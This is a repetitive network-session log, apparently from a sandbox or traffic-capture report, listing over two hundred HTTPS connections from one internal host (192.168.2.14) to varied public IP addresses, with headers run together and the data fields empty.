                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17003192.168.2.144399836.67.53.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17004192.168.2.146036452.40.80.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17005192.168.2.144306847.46.136.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17006192.168.2.145545440.39.77.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17007192.168.2.1459990119.25.196.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17008192.168.2.145785679.233.125.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17009192.168.2.1432888216.53.176.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17010192.168.2.1458142163.42.62.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17011192.168.2.1452722122.198.181.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17012192.168.2.1458444167.250.255.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17013192.168.2.145285699.49.225.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17014192.168.2.145092075.57.231.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17015192.168.2.144297254.84.11.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17016192.168.2.143423841.205.42.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17017192.168.2.1450804113.65.26.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17018192.168.2.146008694.83.128.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17019192.168.2.1439558168.42.100.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17020192.168.2.1435770143.186.49.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17021192.168.2.145077696.77.241.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17022192.168.2.1436814125.135.7.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17023192.168.2.1460604205.155.125.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17024192.168.2.144838687.22.148.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17025192.168.2.1438588166.168.53.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17026192.168.2.145395283.6.54.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17027192.168.2.146003841.118.79.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17028192.168.2.1439062212.90.70.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17029192.168.2.14576781.118.124.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17030192.168.2.1440066100.171.96.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17031192.168.2.1435384182.110.37.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17032192.168.2.1449438134.122.229.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17033192.168.2.1451128125.204.254.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17034192.168.2.1445580154.101.207.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17035192.168.2.1449524184.84.91.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17036192.168.2.1459720209.246.228.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17037192.168.2.1452754113.207.151.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17038192.168.2.143398267.24.39.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17039192.168.2.145493827.119.41.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17040192.168.2.1438068135.204.136.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17041192.168.2.1447818150.182.120.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17042192.168.2.144991468.157.40.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17043192.168.2.1441872221.84.97.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17044192.168.2.1439470160.172.29.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17045192.168.2.145547882.20.105.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17046192.168.2.144377673.231.31.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17047192.168.2.1435022190.133.30.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17048192.168.2.1445854123.56.50.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17049192.168.2.1445266108.218.2.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17050192.168.2.1448102166.25.103.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17051192.168.2.1441230115.70.202.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17052192.168.2.145949292.98.255.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17053192.168.2.1447576170.201.205.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17054192.168.2.1447098217.254.235.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17055192.168.2.143511640.81.242.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17056192.168.2.1452186119.253.5.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17057192.168.2.1443636152.216.222.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17058192.168.2.146000425.103.199.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17059192.168.2.145229649.80.138.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17060192.168.2.144311478.166.142.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17061192.168.2.143734461.244.42.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17062192.168.2.1442992202.136.143.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17063192.168.2.144924860.11.105.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17064192.168.2.1446618149.87.221.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17065192.168.2.144155027.133.29.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17066192.168.2.1437514152.103.163.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17067192.168.2.144083842.114.149.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17068192.168.2.1447216178.224.230.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17069192.168.2.1455752147.152.23.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17070192.168.2.145373835.230.198.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17071192.168.2.1460514120.77.145.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17072192.168.2.1442268118.163.245.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17073192.168.2.144909283.173.98.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17074192.168.2.1436362175.199.234.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17075192.168.2.145038452.145.226.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17076192.168.2.1457908195.70.22.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17077192.168.2.143822674.253.13.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17078192.168.2.145539875.223.169.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17079192.168.2.144652896.52.29.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17080192.168.2.143320418.149.37.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17081192.168.2.145056069.91.79.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17082192.168.2.1440156175.231.81.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17083192.168.2.145931862.146.45.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17084192.168.2.144174239.106.125.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17085192.168.2.1447354209.189.138.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17086192.168.2.145868076.115.245.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17087192.168.2.1452836170.94.10.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17088192.168.2.1440894195.76.53.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17089192.168.2.1457706212.21.189.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17090192.168.2.1459784164.36.18.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17091192.168.2.145121465.200.31.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17092192.168.2.145607098.42.66.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17093192.168.2.1437626115.234.120.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17094192.168.2.145842614.248.234.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17095192.168.2.145268625.172.188.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17096192.168.2.143712287.81.248.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17097192.168.2.1458546104.199.49.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17098192.168.2.145429036.114.53.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17099192.168.2.145104639.120.73.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17100192.168.2.143389443.132.239.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17101192.168.2.1447404205.115.95.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17102192.168.2.144961450.149.117.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17103192.168.2.145062697.221.154.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17104192.168.2.1447454219.91.4.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17105192.168.2.1438596173.173.199.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17106192.168.2.145027225.158.186.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17107192.168.2.144254699.142.121.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17108192.168.2.145961820.1.85.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17109192.168.2.14356561.139.245.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17110192.168.2.144688054.88.44.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17111192.168.2.1448204146.105.56.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17112192.168.2.1436128103.15.226.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17113192.168.2.145099213.215.225.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17114192.168.2.1460178167.167.48.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17115192.168.2.1439690211.222.107.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17116192.168.2.14528109.27.154.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17117192.168.2.1437614185.137.11.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17118192.168.2.1447114145.134.51.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17119192.168.2.1457742142.246.205.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17120192.168.2.144896468.80.84.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17121192.168.2.1460936183.62.115.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17122192.168.2.1439236199.50.143.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17123192.168.2.1453312162.94.215.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17124192.168.2.143390876.66.41.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17125192.168.2.1458920146.43.185.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17126192.168.2.144940078.227.167.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17127192.168.2.144628039.127.88.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17128192.168.2.1454400131.249.254.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17129192.168.2.1454632126.124.108.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17130192.168.2.145953293.4.117.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17131192.168.2.1460712151.11.71.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17132192.168.2.146064668.5.202.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17133192.168.2.144701018.41.43.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17134192.168.2.143910076.140.141.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17135192.168.2.1444404101.47.245.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17136192.168.2.1447292100.158.73.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17137192.168.2.145794262.205.134.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17138192.168.2.1455074161.109.107.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17139192.168.2.144108025.210.22.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17140192.168.2.144931459.22.218.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17141192.168.2.1451658147.92.185.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17142192.168.2.1454446140.178.11.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17143192.168.2.1434810150.246.213.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17144192.168.2.1441834160.202.171.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17145192.168.2.144404639.166.7.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17146192.168.2.1440418152.251.142.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17147192.168.2.14580788.138.167.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17148192.168.2.1448184170.152.190.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17149192.168.2.1444138154.252.201.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17150192.168.2.14505964.69.0.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17151192.168.2.144957070.135.122.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17152192.168.2.143807082.130.125.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17153192.168.2.146040425.90.89.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17154192.168.2.1445104129.138.156.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17155192.168.2.1458154139.68.242.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17156192.168.2.1447082185.253.136.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17157192.168.2.146039246.91.100.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17158192.168.2.145953059.200.107.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17159192.168.2.1459294201.228.187.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17160192.168.2.1445656139.99.77.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17161192.168.2.143537871.121.210.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17162192.168.2.1450250217.45.247.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17163192.168.2.1444892122.169.231.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17164192.168.2.1439576180.30.91.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17165192.168.2.1434136167.6.234.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17166192.168.2.1460162170.116.215.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17167192.168.2.143958086.72.90.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17168192.168.2.1455244160.142.103.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17169192.168.2.143657469.40.62.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17170192.168.2.145480299.119.245.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17171192.168.2.1442082173.204.231.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17172192.168.2.145667471.186.185.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17173192.168.2.1457730141.203.182.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17174192.168.2.1456210150.11.193.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17175192.168.2.144748871.160.1.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17176192.168.2.144664295.29.79.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17177192.168.2.143666689.200.129.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17178192.168.2.146041447.249.168.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17179192.168.2.1460062156.81.84.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17180192.168.2.1449092210.33.181.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17181192.168.2.144688613.192.126.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17182192.168.2.1451144182.86.230.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17183192.168.2.1451748162.158.7.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17184192.168.2.143834462.221.191.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17185192.168.2.144896213.232.168.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17186192.168.2.144342480.93.233.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17187192.168.2.1436890157.64.49.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17188192.168.2.146082044.189.11.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17189192.168.2.145184297.189.41.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17190192.168.2.1454106104.182.223.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17191192.168.2.1456656140.81.173.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17192192.168.2.143890688.174.174.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17193192.168.2.146017019.85.164.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17194192.168.2.1444616177.67.61.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17195192.168.2.1453030124.219.19.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17196192.168.2.143596432.137.191.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17197192.168.2.145169081.153.135.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17198192.168.2.1441270130.231.194.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17199192.168.2.14351521.205.241.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17200192.168.2.14461048.94.72.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17201192.168.2.144848413.187.117.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17202192.168.2.145614814.162.207.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17203192.168.2.1437356110.139.7.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17204192.168.2.144201678.68.192.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17205192.168.2.1437186163.49.63.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17206192.168.2.145532845.128.204.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17207192.168.2.1451662183.184.187.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17208192.168.2.1440860153.86.16.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17209192.168.2.144151060.141.15.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17210192.168.2.1442824155.38.139.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17211192.168.2.1437236180.110.241.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17212192.168.2.1460502221.116.12.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17213192.168.2.145619863.230.204.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17214192.168.2.1439168113.172.11.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17215192.168.2.1442330220.158.133.215443
